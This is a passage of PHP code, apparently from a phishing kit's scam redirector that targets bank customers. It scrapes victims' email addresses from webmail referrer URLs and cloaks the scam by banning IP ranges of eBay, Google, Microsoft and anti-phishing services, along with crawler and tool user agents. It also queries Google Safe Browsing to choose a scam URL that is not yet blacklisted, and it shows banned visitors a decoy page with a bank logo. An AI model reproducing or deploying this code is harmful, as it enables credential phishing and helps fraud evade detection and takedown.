859 $handle = fopen($file, "r");
860 while(!@feof($handle))
861 {
862 $buffer .= @fgets($handle, 4096);
863 }
864
865 if (strstr($buffer,strtolower($str))) {
866 return true;
867 }
868 }
869 return false;
870}
871
872/**
873* Function GetPhishtank will check if Scam Redirector was listed on Phishtank
874*
875* @param referrer Referrer
876* @param ip IP Address
877* @return Boolean value representing whether or not the visitor should been banned
878*/
879function GetPhishtank()
880{
881 $filename = 'phishtank.txt';
882 if (file_exists($filename)) {
883
884 $fh = fopen($filename, 'r');
885 $data = fread($fh, 1024);
886 fclose($fh);
887 return $data;
888 }else{
889$fh = fopen($filename, 'w') or die("Can't open file");
890fwrite($fh, 'No');
891fclose($fh);
892 return "No";
893 }
894}
895
896/**
897* Function GetEmail saves to (emails.txt) file the Email address from referrer, if found
898*
899* @param referrer Referrer
900* @param ip IP Address
901* @return Boolean value representing whether or not the visitor should been banned
902*/
903function GetEmail($referrer, $ip)
904{
905 if (!empty($referrer))
906 {
907 //Tiscali IT
908 $pos = strpos($referrer, ".tiscali.it");
909 if ($pos === false)
910 {
911 //
912 } else
913 {
914 $domain = get_between($referrer, "?d=", "&contentseed=");
915 $user = get_between($referrer, "&u=", "&targetcontainer=");
916 $email = $user."@".$domain;
917 }
918 //FASTWEB
919 $pos = strpos($referrer, ".fastwebnet.it");
920 if ($pos === false)
921 {
922 //
923 } else
924 {
925 $domain = get_between($referrer, "?d=", "&sh=");
926 $user = get_between($referrer, "&u=", "&an=");
927 $email = $user."@".$domain;
928 }
929 //Rediffmail Pro
930 $pos = strpos($referrer, ".rediffmailpro.com");
931 if ($pos === false)
932 {
933 //
934 } else
935 {
936 $email = get_between($referrer, "&login=", "&session_id=");
937 }
938
939 //MAYL.DE
940 $pos = strpos($referrer, ".mayl.de");
941 if ($pos === false)
942 {
943 //
944 } else
945 {
946 $email = get_between($referrer, "&username=", "&rfold=")."@mayl.de";
947 }
948
949 //handbag.com
950 $pos = strpos($referrer, ".handbag.com");
951 if ($pos === false)
952 {
953 //
954 } else
955 {
956 $email = get_between($referrer, "&userid=", "&seq=");
957 $email = str_replace("%40", "@", $email);
958 }
959 //Write to file
960 if ((CheckDuplicate($str, EMAILSFILE) == FALSE) && ($email <> "") && ($email <> "@"))
961 {
962 $fh = fopen(EMAILSFILE, 'a');
963 $str = "$ip - $email";
964 fwrite($fh, $str."\n");
965 fclose($fh);
966 }
967 }
968}
969
970/**
971* Function InitStats creates the the settings file, used to provide statistics
972*/
973function InitStats()
974{
975if (!file_exists('stats.txt'))
976 {
977 $fh = fopen('stats.txt', 'a');
978 fwrite($fh, time()."\n0\n0\n0\n10\n0\n");
979 fclose($fh);
980 }
981}
982
983/**
984* Function checkMatch check if the string matches our banned string
985*
986* @param str string
987* @param array Array with banned strings
988* @return Boolean value representing whether or not the visitor should been banned
989*/
990function readable_time($timestamp, $num_times = 2)
991{
992 //this returns human readable time when it was uploaded (array in seconds)
993 $times = array(31536000 => 'Year', 2592000 => 'Month', 604800 => 'Week', 86400 => 'Day', 3600 => 'Hour', 60 => 'Minute', 1 => 'Second');
994 $now = time();
995
996 /* Incorporates fix by Waylon */
997 $secs = $now - $timestamp;
998 //Fix so that something is always displayed
999 if ($secs == 0) {
1000 $secs = 1;
1001 }
1002 /* /Waylon */
1003
1004 $count = 0;
1005 $time = '';
1006
1007 foreach ($times AS $key => $value)
1008 {
1009 if ($secs >= $key)
1010 {
1011 //time found
1012 $s = '';
1013 $time .= floor($secs / $key);
1014
1015 if ((floor($secs / $key) != 1))
1016 $s = 's';
1017
1018 $time .= ' ' . $value . $s;
1019 $count++;
1020 $secs = $secs % $key;
1021
1022 if ($count > $num_times - 1 || $secs == 0)
1023 break;
1024 else
1025 $time .= ', ';
1026 }
1027 }
1028 return $time;
1029}
1030
1031//Array with banned IPs, also 127.0.0.1 because somehow the IP can pe spoofed
1032$ban_array = array('202.76.240-202.76.247', '195.234.136', '66.77.136', '66.16.13.0-66.16.13.63', '66.135.192-66.135.223', '193.28.178', '217.159.130.168-217.159.130.175', '216.113.160-216.113.191', '216.33.244-216.33.247', '216.33.236-216.33.243', '66.211.160-66.211.191', '217.168.153-217.168.156', '66.249.64-66.249.95', '67.195', '66.227.16.0-66.227.16.127',
1033 '66.179.80.0-66.179.80.15', '209.147.112-209.147.127', '209.191.64-209.191.127', '64.111.96-64.111.127', '72.14.192.0-72.14.255.255', '174.237.1.1-174.237.255.255', '76.116.1.1-76.116.255.255',
1034 '208.67.157.213', '193.147.160-193.147.179', '207.34.136.103', '62.149.226.208',
1035 '12.90.64.238', '84.99.95', '150.70', '198.23.5', '166.68.134',
1036 '10.190.38.164', '75.125.130', '72.13.32-72.13.63', '128.232', '97.77.68.206',
1037 '220.97', '138.26', '38.98.19.111', '82.81', '144.214',
1038 '194.246.126-194.246.127', '77.124-77.127', '66.113.96-66.113.111',
1039 '203.5.112', '115.145', '124.180.239.165', '62.212.10.250',
1040 '159.149', '79.176-79.183', '62.67.240-62.67.241', '163.221', '91.121.64-91.121.143',
1041 '209.123.109.175', '209.123.192.187', '66.196.64-66.196.127', '208.109',
1042 '216.69.128-216.69.191', '72.244.219.54', '194.72.238', '192.76.82',
1043 '195.254.224-195.254.226', '74.55.44.237', '206.208.58', '149.20',
1044 '219.117.238.174', '212.102.67', '216.239.32-216.239.63', '64.114.199',
1045 '131.107', '74.53', '81.218', '91.199.104', '131.114',
1046 '78.129.140', '207.206.148', '165.166.47.186', '210.230.183', '59.188.106.242',
1047 '69.20.70.31', '209.235.254.107', '66.118.156-66.118.157', '66.230.220',
1048 '208.64.136-208.64.143', '209.120.218.128-209.120.218.255',
1049 '208.115.138-208.115.139', '216.128.11',
1050 '216.171.98.64-216.171.98.127', '66.16.13.59', '128.130', '212.27.36.1', '74.208',
1051 '219.127.103.193-219.127.103.254', '66.179.210.128-66.179.210.255', '195.214.79',
1052 '62.67.194', '66.16.13.55', '194.250.175',
1053 '82.80.128-82.80.159', '66.118.188.128-66.118.188.255', '62.219',
1054 '212.227.103.74', '209.131.32-209.131.63', '84.110.48-84.110.63', '72.37.244',
1055 '160.83', '65.52-65.55', '195.127.173.128-195.127.173.191', '24.123.240.186',
1056 '66.230.194', '98.64.68.139', '194.88.228-194.88.229', '64.41.151', '64.156.26',
1057 '65.17.248-65.17.255', '72.37.171', '60.248.169.142', '67.202',
1058 '174.129', '208.118.60', '72.44.32-72.44.63', '80.254.144-80.254.159', '141.212.110.65',
1059 '64.127.98.128', '8.6.118.7', '221.186.93.163', '217.212.224.128-217.212.224.255',
1060 '74.6', '193.47.80', '66.235.112-66.235.127', '204.187.65', '63.236.244-63.236.245',
1061 '211.78.130', '208.81.237.128-208.81.237.255', '194.106.220-194.106.221', '194.153.113', '8.21.4.254',
1062 '213.136.52.0-213.136.52.127', '192.18.0-192.18.194', '192.245.12', '69.36.252', '64.16.237',
1063 '88.80.205.192-88.80.205.223', '78.90.16.77', '143.215', '216.82.240-216.82.255',
1064 '208.80.200-208.80.207', '64.12.112', '195.93.18', '205.188.112', '207.200.112',
1065 '205.178.184-205.178.191', '165.212', '203.198', '81.173.0-81.173.127', '211.104-211.119',
1066 '219.76-219.79', '203.71-203.72', '61.208.232-61.208.255', '210.87.240-210.87.255', '220.255',
1067 '218.102-218.103', '141.217', '74.92.105.141', '144.137.8.170', '207.171.160-207.171.191',
1068 '98.130-98.131', '116.48-116.49', '195.93.64', '70.54.212.160-70.54.212.175', '208.87.136-208.87.139',
1069 '207.206.202-207.206.203', '12.1.231.96-12.1.231.127', '198.6.32-198.6.63', '66.193.242.5', '216.73.80-216.73.95',
1070 '216.185.96-216.185.127', '174.132-174.133', '66.223.0-66.223.127', '83.89.217.82', '208.80.192-208.80.199',
1071 '62.231.131', '72.30', '192.92.94', '38.100.41', '74.201.145',
1072 '212.117.160-212.117.175', '149.156.2', '220.233.112.41', '216.128.0-216.128.31', '62.241.4-62.241.5',
1073 '213.198.84.192-213.198.84.223', '217.114.220.0-217.114.220.63', '216.104.0-216.104.31', '86.17.163.200', '206.210.93',
1074 '216.145.24.13', '213.199.128-213.199.143', '193.108.72-193.108.79', '86.171.213.150', '213.161.88-213.161.89',
1075 '70.84-70.87', '204.16.206', '86.171.209.252', '78.129.174',
1076 '62.141.32-62.141.43', '124.43', '74.125', '85.158.136-85.158.143', '69.41.160-69.41.191',
1077 '62.189.112.128-62.189.112.255', '216.49.80-216.49.95', '38.105.71', '87.237.108', '74.63.64-74.63.127',
1078'67.159.0-67.159.63', '66.220.111', '193.200.150', '213.186.32-213.186.63', '63.82.71.128-63.82.71.143', '83.221.114',
1079'64.127.96-64.127.127', '84.97.0.0-84.103.231.255', '195.212.29', '212.97.132-212.97.135', '85.17.56', '212.227.68-212.227.108',
1080 '50.16', '66.150.14', '109.65', '66.150.9.128-66.150.9.191', '62.99.77.165', '220.130.53.5', '62.249.178.200',
1081'69.36.190.48');
1082
1083$owner_array = array('eBay', 'eBay', 'eBay', 'Technology Universe, LLC', 'eBay', 'eBay', 'Skype Technologies OU', 'eBay', 'eBay', 'Microsoft Corp', 'eBay', 'MAN1 Network C', 'Google', 'Yahoo!');
1084
1085// '127.0.0.1',
1086//Define banned words found in hostname, UA & referrer
1087$bw = array('phish', 'clean-mx', 'libwww', 'clamav', 'wget', 'web-sniffer',
1088 '10.112.10.10', 'jakarta commons', 'siteadvisor.com', 'bezeqint', 'fraudwatch',
1089 'scampatmaker', 'urllib', 'brantect.com', 'm2k agetnt', 'showthread.php',
1090 '.blogspot.com', '.mailprotector.net', 'groups.yahoo.com', 'crawler', 'lwp::simple',
1091 'webwasher', 'w3m/', 'www-mechanize/', 'libcurl', 'google.com/search', 'www.google.com', '.ipt.aol.com', '"', 'lionic.com');
1092
1093//'.mailprotector.net' should be moved to the new updates in the future
1094
1095//Define banned words found in UA & referrer
1096$bua = array('', 'Mozilla/5.0 (compatible; en-us)', 'Mozilla/4.0 (compatible;)', 'Mozilla/4.0 (compatible)', 'Mozilla/4.0', 'Mozilla/6.0', '12345', 'Mozilla/3.01 (compatible;)', 'JetBrains 5.0', 'JetBrains 4.0', '.');
1097
1098//Suspicious IPs
1099$susp_array = array('203.27.226', '121.72.138.44', '209.244.4', '78.149.92.246',
1100'86.57.32-86.57.63', '131.215', '84.101.228.107', '207.157.0-207.157.127', '89.240.114.70',
1101'89.240', '205.209.128-205.209.191', '149.156', '86.171.153.79', '81.159.187.250');
1102
1103//Custom IPs
1104$custom_array = array('98.130-98.131');
1105
1106/*
1107Statistics
1108*/
1109//$array = file('stats.txt');
1110
1111$fh = fopen('stats.txt', 'r');
1112$data = fread($fh, 512);
1113$array = explode(",", $data);
1114fclose($fh);
1115
1116$tim = $array[0];
1117$vst = $array[1];
1118$unq = $array[2];
1119$bnd = $array[3];
1120$wat = $array[4];
1121$nor = $array[5];
1122
1123$vst = $vst + 1;
1124
1125if (checkUniqueIP($ip) == false)
1126{
1127 $fh = fopen('ip.txt', 'a');
1128 fwrite($fh, $ip."\n");
1129 fclose($fh);
1130 $unq = $unq + 1;
1131}
1132
1133function WriteStats($tim, $vst, $unq, $bnd, $wat, $nor)
1134{
1135 $fh = fopen('stats.txt', 'w');
1136 fwrite($fh, "$tim,$vst,$unq,$bnd,$wat,$nor");
1137 fclose($fh);
1138}
1139
1140//Returns the scam url with
1141function ScamURL($scams)
1142{
1143 for ($i = 0; $i <= count($scams) - 1; $i++)
1144 {
1145 //Download each scam page for checking
1146 /*
1147
1148 Warning: file_get_contents(the url) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 500 Internal Server Error in file on line 1053
1149 */
1150 $scam_page = file_get_contents($scams[$i] . PATH);
1151
1152 //Add <ISONLINE VALUE=TRUE></ISONLINE> to your scam page
1153 $online = get_between($scam_page, "<ISONLINE VALUE=", "></ISONLINE>");
1154 if ($online == "TRUE")
1155 {
1156 //Check if it is blacklisted
1157 if (GOOG_ANTIPHISH == 1)
1158 {
1159 $goog_url = "http://sb.google.com/safebrowsing/lookup?sourceid=firefox-antiphish&features=TrustRank&client=navclient-auto-tbff&q=".$scams[$i].PATH;
1160 $google_page = file_get_contents($goog_url);
1161 $blacklisted = strpos($google_page, "phishy:1:1");
1162 if ($blacklisted === false)
1163 {
1164 $scam_url = $scams[$i] . PATH;
1165 return $scam_url;
1166 break;
1167 }
1168 } elseif (GOOG_ANTIPHISH == 0)
1169 {
1170 $scam_url = $scams[$i] . PATH;
1171 return $scam_url;
1172 break;
1173 }
1174
1175 }
1176 }
1177}
1178
1179//Write IP Address to On The Fly banning list
1180if (checkWord($hostname, $bw) || checkWord($agent, $bw) || checkWord($referrer, $bw))
1181{
1182 $file = "ip_ban.txt";
1183
1184 if (CheckDuplicate($ip, $file) == FALSE)
1185 {
1186 $fhandle = fopen($file, "a");
1187 fwrite($fhandle, $ip."\n");
1188 fclose($fhandle);
1189 }
1190}
1191
1192if ($desktop_ban && !checkMobile()){
1193 $file = "ip_ban.txt";
1194
1195 if (CheckDuplicate($ip, $file) == FALSE)
1196 {
1197 $fhandle = fopen($file, "a");
1198 fwrite($fhandle, $ip."\n");
1199 fclose($fhandle);
1200 }
1201}
1202
1203if (checkIP($ip, $susp_array))
1204{
1205 $fhandle = fopen(LOG_FILE, "a");
1206 fwrite($fhandle, "<font color=blue>" . $ip . " - " . $hostname . " - " . $dt . " - " . $agent . " - " . MailFromReferrer($referrer) . " - " . NumberFromUri() . " - " . counter() . "</font><br/>");
1207 fclose($fhandle);
1208 $wat = $wat+1;
1209 WriteStats($tim, $vst, $unq, $bnd, $wat, $nor);
1210}
1211
1212if (checkIP($ip, $ban_array) || checkMatch($agent, $bua) || checkAsRedirect($referrer) || checkWord($hostname, $bw) || checkWord($agent, $bw) || checkWord($referrer, $bw) || checkTorNode($ip) || checkOnTheFlyBan($ip))
1213{
1214 $fhandle = fopen(LOG_FILE, "a");
1215 fwrite($fhandle, "<font color=red>" . $ip . " - " . $hostname . " - " . $dt . " - " . GetIPOwner($ip, $ban_array, $owner_array) ." - " . $agent . " - " . MailFromReferrer($referrer) . " - " . NumberFromUri() . " - " . counter() .
1216 "</font><br/>");
1217 fclose($fhandle);
1218 $bnd = $bnd+1;
1219 WriteStats($tim, $vst, $unq, $bnd, $wat, $nor);
1220 $data = <<<EOT
1221 <html>
1222 <body style="background-color:#072146;">
1223 <img src="data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNTkyIiBoZWlnaHQ9IjgxIiB2aWV3Qm94PSIwIDAgNTkyIDgxIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjx0aXRsZT5iYnZhY29tcGFzcy13aGl0ZTwvdGl0bGU+PGRlc2M+Q3JlYXRlZCB3aXRoIFNrZXRjaC48L2Rlc2M+PGcgZmlsbD0iI2ZmZiI+PHBhdGggZD0iTTQzOS4xMDggNjAuMDFjLTUuOTQ1IDAtMTAuMDg0LTEuNjU4LTEzLjc0Ni01LjUzMXYtMjMuNTkyYzUuMTY0LTYuMDg2IDEwLjI2LTguOTI4IDE2LjAwMi04LjkyOCA4LjM5OCAwIDEzLjAyNSA2LjcwOSAxMy4wMjUgMTguODg5IDAgMTUuODQtOC4zMTIgMTkuMTYyLTE1LjI4MSAxOS4xNjJtMi45NzgtNDQuMDM1Yy02LjE2IDAtMTEuODkyIDIuNDY5LTE2LjcyNCA3LjE4di0uODA1YzAtMy45NjctLjM1Mi01LjgzOC0zLjU4LTUuODM4aC0zLjIxN3Y2My45MjRoNi43OTd2LTE4Ljc3NGM0LjAwNCAyLjkyNCA4LjU5NiA0LjI0OCAxNC41NTggNC4yNDggNS4wMTIgMCAyMS4zNTgtMS44NDEgMjEuMzU4LTI1LjUwOSAwLTIyLjA0OS0xMy40MjItMjQuNDI2LTE5LjE5Mi0yNC40MjYiLz48cGF0aCBkPSJNNDk5LjE2NSA1My41MzljLTEuNzMgMS45OTYtMy41NTUgMy42OTctNS42OTMgNC44NjctMi4yNSAxLjI1NC00Ljk3NSAyLTguNjA2IDItMS40NzIgMC0yLjg0Ny0uMTctNC4xMTEtLjUyNS0uOTA4LS4yNTItMS43MDctLjYzOS0yLjQ0NS0xLjExMy0xLjA1MS0uNjg0LTEuODk3LTEuNjE0LTIuNTI2LTIuODU4LS42MjktMS4yNjYtLjk3OC0yLjgzNC0uOTc4LTQuNzk1IDAtMS42OC4zMzktMi45OTYuOTc4LTQuMDg0LjQ5LS44MzggMS4wODQtMS41MzkgMS44NTgtMi4yMTkgMS4xMy0uOTI3IDIuNjM2LTEuNTkxIDQuNDYyLTIuMDc2IDEuNzctLjQ2NSAzLjgyMy0uNjg5IDYuMTI1LS42ODkgNC4wNDcgMCA3LjYxOC41MjkgMTAuOTM2IDEuMjU0djEwLjIzOHptMy4wNTUtMzMuNDM2Yy0xLjUwOC0xLjQ4Ni0zLjQ2OS0yLjU2Ni01Ljc2OC0zLjIxOC0yLjIyMy0uNjM3LTQuNzgzLS45MS03LjUzNy0uOTEtOS40MDIuMDUtMTQuNjkxIDIuNzczLTE4LjEyOSA0LjczIDIuNTQzIDUuMzc3IDUuMjMzIDQuMDYxIDguNzA5IDIuNTY2IDIuNjY4LTEuMTQ2IDUuNzQyLTEuNjI3IDguOTg0LTEuNjI3IDEuNDg5LjAwNCAzLjEyOS4zNTQgNC43MjEuNjc4Ljk0LjI1MiAxLjc4MS42MDQgMi40NzkgMS4wMTIgMS4xMzguNzA3IDEuOTQ1IDEuNTgyIDIuNTU4IDIuNzEzLjYgMS4xNDQuOTI4IDIuNjU0LjkyOCA0LjU5djcuMDIzYy0zLjU1NS0uNzkxLTcuMTM1LTEuMTQ2LTExLjIxMy0xLjE0Ni0yLjg1NSAwLTUuNDcxLjI3MS03LjkuODQ5LTEuNzc2LjQ0Mi0zLjM4NSAxLjAzOS00LjkyNCAxLjgyNi0yLjE5NSAxLjIwNC0zLjk5OCAyLjgzOC01LjI3MiA0Ljg3Ny0xLjI2MSAyLjA5LTEuOTEgNC41NDUtMS45MSA3LjQxMiAwIDIuMzI3LjQxNiA0LjQ5OSAxLjE4NCA2LjMzOCAxLjIyMSAyLjc1MiAzLjMxMiA0LjkzIDUuOTA2IDYuMzI1IDIuNjM5IDEuNDI1IDUuNzI3IDIuMTM2IDkuMjE1IDIuMTM2aC4wMTJjNC4wMTcgMCA3LjIwNS0uNzQ4IDkuOTMxLTIuMDE5IDEuODYtLjkxIDMuNDgzLTIuMDIgNC45NzEtMy4zNDQuMDMxLjY0NS4wODIgMS4xNjguMTU4IDEuNjYuMDcyLjUzNS4yMDcgMS4wMTYuNDQ5IDEuNDUzLjE2My4zMjMuMzczLjY0NS42NTkuODk1LjQyOS4zNDQuOTIzLjU4NiAxLjQyNS43MDMuNTE2LjEzOSAxLjEwMi4xNzggMS43MjUuMTc4aDIuMzgzdi0zNS40NTVjMC0yLjU1MS0uNDI0LTQuNzM3LTEuMjM1LTYuNjMxLS42MDMtMS40MTItMS40NDEtMi42MjEtMi41MDktMy42MTR6Ii8+PHBhdGggZD0iTTI1OC45ODMgNi4xNjhjMS41MTggMCAyLjg4Ny4wOSA0LjE0MS4yNTQgMi43MjYuMzQ4IDQuODggMS4wNDMgNi42NjIgMS45MzVsLjE4Ny4wOTYuNjU2LjM1NmMuMzE5LjE4OS42MzMuMzc3LjkyMi41NjhsLjA2MS4wNDUuNS4zNDguNTUzLjQyOWMuNTA0LjQxNi45OC44MyAxLjQzOSAxLjIxNS40OTQuNDEuOTczLjc3OSAxLjQ1MSAxLjA3IDEuNzM3IDEuMDU5IDMuNDg1IDEuMDY1IDYuMTY2LTEuOTYyLS44NDItMS4yMTctMS43MzQtMi4yNjgtMi42NDItMy4xOTItNC40NTMtNC41MjktOS4zMzgtNS44MDEtMTEuMzI1LTYuNDA0bC0uMDQxLS4wMTRjLTEuMzg4LS4zMzQtMi45MS0uNTY2LTQuNTg5LS43MjMtMS4zNTgtLjEyMS0yLjgxMy0uMTg5LTQuNDExLS4xODktMTQuNDA0IDAtMjguOTM3IDEwLjE3Mi0yOC45MzcgMzIuOTFsLjAwNC4xOC0uMDA0LjE4MmMwIDIyLjczMiAxNC41MzMgMzIuOTA2IDI4LjkzNyAzMi45MDYgMS41OTggMCAzLjA1My0uMDY5IDQuNDExLS4xOSAxLjY3OS0uMTUyIDMuMjAxLS4zOTQgNC41ODktLjcyNmwuMDQxLS4wMDhjMS45ODctLjYwNiA2Ljg3Mi0xLjg3NSAxMS4zMjUtNi40MDQuOTA4LS45MjIgMS44LTEuOTczIDIuNjQyLTMuMTk0LTIuNjgxLTMuMDIzLTQuNDI5LTMuMDIxLTYuMTY2LTEuOTYzLS40NzguMjkzLS45NTcuNjYxLTEuNDUxIDEuMDczLS40NTkuMzg2LS45MzUuNzk3LTEuNDM5IDEuMjEzbC0uNTUzLjQyOS0uNS4zNS0uMDYxLjA0NWMtLjI4OS4xOTMtLjYwMy4zNzktLjkyMi41NjZsLS42NTYuMzU4LS4xODcuMDkxYy0xLjc4Mi44OTctMy45MzYgMS41OTQtNi42NjIgMS45NDQtMS4yNTQuMTU4LTIuNjIzLjI0OC00LjE0MS4yNDgtMTMuNTQzIDAtMjEuOTU3LTEwLjE3NC0yMS45NTctMjYuNTU5bC4wMS0uMzYxLS4wMS0uMzZjMC0xNi4zODQgOC40MTQtMjYuNTYyIDIxLjk1Ny0yNi41NjIiLz48cGF0aCBkPSJNNTMzLjkzNyAzNy4xMDdjLTkuNjgyLTEuNjI5LTExLjMxNi0zLjc1Mi0xMS4zMTYtNy44OTUgMC00Ljk5OCAzLjQzMS03LjQxOSAxMC40OTYtNy40MjkgNS44MzItLjAwNiA3Ljc3MyAxLjU1NiA5LjU0NSAyLjM1NyAxLjc3My44MDUgMy4yNTYuOTg3IDUuMTM0LTEuMjYzLjI0Ny0uMjk3LjQ5OS0uNjMxLjc2Mi0xLjAxMi0uMjA5LS4yMzEtLjQ2MS0uNDg4LS43NjItLjc3Mi02LjA2OC01LjI2NS0xMi4xMzItNS4xMTktMTQuNzY5LTUuMTE5LTEwLjQ0NyAwLTE2LjkzNiA1LjIxMS0xNi45MzYgMTMuNTk4IDAgOS44OTYgOC4zNzUgMTIuNTAyIDE1LjY3MiAxMy42NzIgOS45MjIgMS41OTIgMTEuNjcyIDMuODk4IDExLjY3MiA4LjE2MiAwIDYuMDM1LTMuODE4IDguOTY1LTExLjY3MiA4Ljk2NS0zLjU3OCAwLTYuMzY5LS43MzUtOC41MS0xLjcyN3YuMDFjLTMuMjE2LTEuNTIyLTUuMDM1LTMuMDg0LTcuNjEzLS4zMTEtLjM2OS4zOTktLjc1NC44ODUtMS4xNiAxLjQ3MS4zMDMuMzI4LjY4Mi43MTcgMS4xNiAxLjE0MS45My44MiAyLjIzMSAxLjc4NyA0LjAzIDIuNzQyIDEuMDMzLjQ5NCAyLjIxOC45NjUgMy41ODMgMS4zNTkgMi4zMjMuNjcyIDUuMTcgMS4xMjUgOC42OSAxLjEyNSAxMS43MzYgMCAxOC4xOTktNS4zNzUgMTguMTk5LTE1LjEzNSAwLTEwLjAzMS03Ljc5My0xMi42My0xNi4yMDUtMTMuOTM5Ii8+PHBhdGggZD0iTTU3NS4yNjkgMzcuMTA3Yy05LjY4Ni0xLjYyOS0xMS4zMTgtMy43NTItMTEuMzE4LTcuODk1IDAtNC45OTggMy40MzEtNy40MTkgMTAuNDk2LTcuNDI5IDUuODMtLjAwNiA3Ljc3MyAxLjU1NiA5LjU0NyAyLjM1NyAxLjc3My44MDUgMy4yNTQuOTg3IDUuMTM0LTEuMjYzLjI0Ni0uMjk3LjQ5OC0uNjMxLjc2NC0xLjAxMi0uMjExLS4yMzEtLjQ2My0uNDg4LS43NjQtLjc3Mi02LjA3LTUuMjY1LTEyLjEzNC01LjExOS0xNC43NzEtNS4xMTktMTAuNDQ3IDAtMTYuOTM0IDUuMjExLTE2LjkzNCAxMy41OTggMCA5Ljg5NiA4LjM3MyAxMi41MDIgMTUuNjcgMTMuNjcyIDkuOTI2IDEuNTkyIDExLjY3MiAzLjg5OCAxMS42NzIgOC4xNjIgMCA2LjAzNS0zLjgxOCA4Ljk2NS0xMS42NzIgOC45NjUtMy41NzggMC02LjM2OS0uNzM1LTguNTA4LTEuNzI3di4wMWMtMy4yMTYtMS41MjItNS4wMzctMy4wODQtNy42MTUtLjMxMS0uMzY3LjM5OS0uNzUyLjg4NS0xLjE1NiAxLjQ3MS4yOTcuMzI4LjY3OC43MTcgMS4xNTYgMS4xNDEuOTMuODIgMi4yMzMgMS43ODcgNC4wMjggMi43NDIgMS4wMzUuNDk0IDIuMjIuOTY1IDMuNTg3IDEuMzU5IDIuMzI1LjY3MiA1LjE3IDEuMTI1IDguNjg4IDEuMTI1IDExLjczOCAwIDE4LjIwMS01LjM3NSAxOC4yMDEtMTUuMTM1IDAtMTAuMDMxLTcuNzk1LTEyLjYzLTE2LjIwNS0xMy45MzkiLz48cGF0aCBkPSJNMzI0LjE1NyA0OS4zMzJjLTEuMTQ2IDMuNTktMy4wMiA2LjI1NC01LjQ5NiA4LjA5Mi0yLjUxOCAxLjgzNC01LjY4NCAyLjgwOC05LjQ3MyAyLjgwOC0yLjU1OCAwLTQuODItLjQ0NS02Ljc4MS0xLjI3NS0yLjkzLTEuMjMtNS4yMjctMy4zNzEtNi44NjctNi4zNTItMS41OTYtMy4wMDItMi40ODUtNi44NDctMi40ODUtMTEuNTcyIDAtMy4wOTkuMzc5LTUuODUzIDEuMTM1LTguMjUyIDEuMTI1LTMuNTUzIDMuMDItNi4yODEgNS41MS04LjEzMSAyLjQ5LTEuODk4IDUuNjY0LTIuODcxIDkuNDg4LTIuODcxIDIuNTE0IDAgNC43ODUuNDM0IDYuNzI1IDEuMjcyIDIuOTU5IDEuMjk1IDUuMjQgMy40NTkgNi44MzIgNi40OTYgMS42NSAyLjk4MiAyLjUzMyA2Ljg1OSAyLjUzMyAxMS40ODYgMCAzLjEzMy0uMzkyIDUuOTI4LTEuMTIxIDguMjk5bS0xLjY3NC0yOS40NjFjLTMuNjM3LTIuNTg2LTguMTgxLTMuOTE0LTEzLjI5NS0zLjg5Ni0zLjQxMiAwLTYuNTE1LjU3Mi05LjM0MiAxLjY3OS00LjE5NyAxLjc2NC03LjYzMiA0Ljc0NC05Ljk4NCA4LjczNS0yLjM1IDQuMDA0LTMuNjMxIDguOTgyLTMuNjMxIDE0LjY0NCAwIDMuODI0LjU2OSA3LjI3NiAxLjY1MSAxMC4zNzMgMS41OTkgNC42MDIgNC4zNzcgOC4yOTkgOC4wMjMgMTAuODM2IDMuNjc4IDIuNDg2IDguMTk5IDMuODQ0IDEzLjI4MyAzLjg0NCAzLjM3OSAwIDYuNTI4LS42MTkgOS4zNzMtMS43NDYgNC4xODQtMS43MTEgNy42MjktNC42NzYgOS45NS04LjY0NyAyLjM5NC0zLjk2NiAzLjYzNi04Ljk1MSAzLjYzNi0xNC42NiAwLTMuNzg1LS41NTEtNy4yODUtMS42MDUtMTAuMzM2LTEuNjMzLTQuNjI5LTQuMzg5LTguMzMyLTguMDU5LTEwLjgyNiIvPjxwYXRoIGQ9Ik00MDQuNDc4IDE5LjY5N2MtMS4yMTEtMS4zNDYtMi43NC0yLjMxNi00LjM3OS0yLjkwMi0xLjY3OS0uNTczLTMuNTE5LS44MjEtNS40MjktLjgyMS0zLjk2MSAwLTcuNjY3Ljk1Mi0xMC45NjEgMi40Mi0yLjc0OCAxLjI2Mi01LjIgMi44MDctNy4zNzUgNC41MDYtLjMzNC0uODQ0LS43NTQtMS42MjEtMS4yMzctMi4zMDEtMS4yMTctMS42MzItMi44NDQtMi44NTktNC42ODctMy42MDEtMS44MDMtLjczOS0zLjc5MS0xLjAyNC01LjgyMy0xLjAyNC00LjA4NSAwLTcuODMgMS4wMjQtMTEuMDgyIDIuNTQ3LTIuNDEgMS4xNTYtNC42MDMgMi41MTItNi41MDMgMy44Nzd2LS4wOWMwLTEuMDU2LS4wMTItMS44OTItLjExLTIuNTk5LS4wNDEtLjUyMi0uMTM5LTEuMDAyLS4yNzEtMS40NTctLjEyMS0uMzA5LS4yOTMtLjYyNS0uNTU3LS44NzctLjE2OC0uMTktLjM2NS0uMzc3LS41ODItLjQ3My0uMzYxLS4xOTctLjY4LS4zMDEtMS4wMzUtLjM0LS4zNTItLjA0MS0uNjc0LS4wNDUtMS4wMS0uMDcyaC0zLjIwNXY0OS4xOTdoNi43N3YtMzYuNjc0YzIuMjkxLTEuODU1IDQuNjYtMy41NDYgNy4xODktNC44MTYgMi43MDUtMS4zNCA1LjU0OS0yLjE4IDguNzk3LTIuMTggMS4xODIgMCAyLjI0NC4xMTIgMy4xNy4zNDguNzA1LjE5MyAxLjI4My40OCAxLjc5OS44MTIuNzY3LjU1NyAxLjM2MyAxLjI3IDEuOCAyLjMwMy40NTIgMS4wODQuNzEzIDIuNDgxLjcxMyA0LjM0MnYzNS44NjVoNi44MDl2LTM2LjcyNmMyLjI1NC0xLjgwMyA0LjYzOS0zLjQ4MSA3LjEzOS00Ljc1NiAyLjY4My0xLjM0IDUuNTIzLTIuMTg4IDguNjMtMi4xODggMS4yODQgMCAyLjQwOS4xMTIgMy4zNDYuMzQ4LjY5OS4xOTMgMS4zMDUuNDggMS44My44MTIuNzU4LjU1MyAxLjMyMSAxLjI1MiAxLjc1NiAyLjMwMy40MjIgMS4wNzguNjYyIDIuNDYzLjY2MiA0LjM0MnYzNS44NjVoNi43NXYtMzcuMTI1YzAtMi4xODEtLjMzOC00LjA0OS0uOTU1LTUuNzA1LS40OS0xLjIxOS0xLjE1OC0yLjI4NS0xLjk1OS0zLjE2Ii8+PHBhdGggZD0iTTE2OC4wMzUgNDIuMDYzbDguOTUxLTI5Ljg2OSA5LjA2NyAyOS44NjloLTE4L